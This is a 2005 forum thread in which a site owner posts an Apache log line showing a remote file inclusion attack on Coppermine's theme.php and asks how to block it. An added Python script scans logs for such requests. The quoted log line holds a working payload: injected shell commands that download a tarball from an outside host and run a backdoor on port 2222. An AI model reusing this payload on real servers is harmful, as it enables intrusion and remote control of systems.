Topic: Hack attempt on ../themes/default/theme.php


Mherb

Hack attempt on ../themes/default/theme.php
« on: March 26, 2005, 09:15:20 pm »

Code:
202.95.145.102 - - [26/Mar/2005:18:02:28 +0100] "GET modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.geocities.com/hendra_juzt/inject.txt?&cmd=uname%20-a;id;cd%20/dev/shm;wget%20makassar.us/ary.tar.gz;tar%20zxvf%20ary.tar.gz;cd%20.psy;./config%20REMON%202222;./*beep*;./run HTTP/1.1" 200 12655 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

Even if I am not vulnerable in this way because wget and other commands are not allowed except for root, I wonder how I could fix Coppermine to not allow this junk.

bye
mherb

Nibbler

  • Guest
Re: Hack attempt on ../themes/default/theme.php
« Reply #1 on: March 26, 2005, 09:20:35 pm »

That's a nuke-related vulnerability; standalone Coppermine isn't affected.
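
A log check for the request pattern shown in the first post (a remote URL passed as a script parameter), as an added example that is not part of the original thread. The sample lines, hosts and IPs are constructed, and the function names `inspect` and `scan` are hypothetical.

```python
import re
from urllib.parse import parse_qsl

# Apache common/combined log prefix: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)   # value is an absolute URL
SHELL_CHAIN = re.compile(r'[;|`]|\$\(')                # command chaining / substitution

def inspect(line):
    """Return a finding for a request that passes a remote URL as a parameter, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m['target'].partition('?')
    # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
    params = parse_qsl(query, keep_blank_values=True, separator='&')
    remote = [k for k, v in params if REMOTE_URL.match(v)]
    if not remote:
        return None
    return {
        'ip': m['ip'], 'time': m['ts'], 'path': path,
        'status': int(m['status']),   # 200 = script was reached, not proof of inclusion
        'remote_params': remote,
        'chained_params': [k for k, v in params if SHELL_CHAIN.search(v)],
    }

def scan(lines):
    """Run inspect() over an iterable of log lines and keep only the findings."""
    return [f for f in map(inspect, lines) if f]

# Constructed sample lines (documentation IPs and example hosts)
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Mar/2005:18:02:28 +0100] "GET modules/coppermine/themes/default/theme.php'
    '?THEME_DIR=http://files.example.net/inject.txt?&cmd=uname%20-a;id HTTP/1.1" 200 12655 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [26/Mar/2005:18:03:01 +0100] "GET /index.php?cat=2&page=1 HTTP/1.1" 200 8841 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [26/Mar/2005:18:04:12 +0100] "GET /themes/default/theme.php'
    '?THEME_DIR=http%3A%2F%2Ffiles.example.net%2Fx.txt HTTP/1.1" 404 312 "-" "Mozilla/4.0"',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Parameters that legitimately carry absolute URLs (redirect targets, for instance) will match too, so treat hits as triage input rather than confirmed compromise.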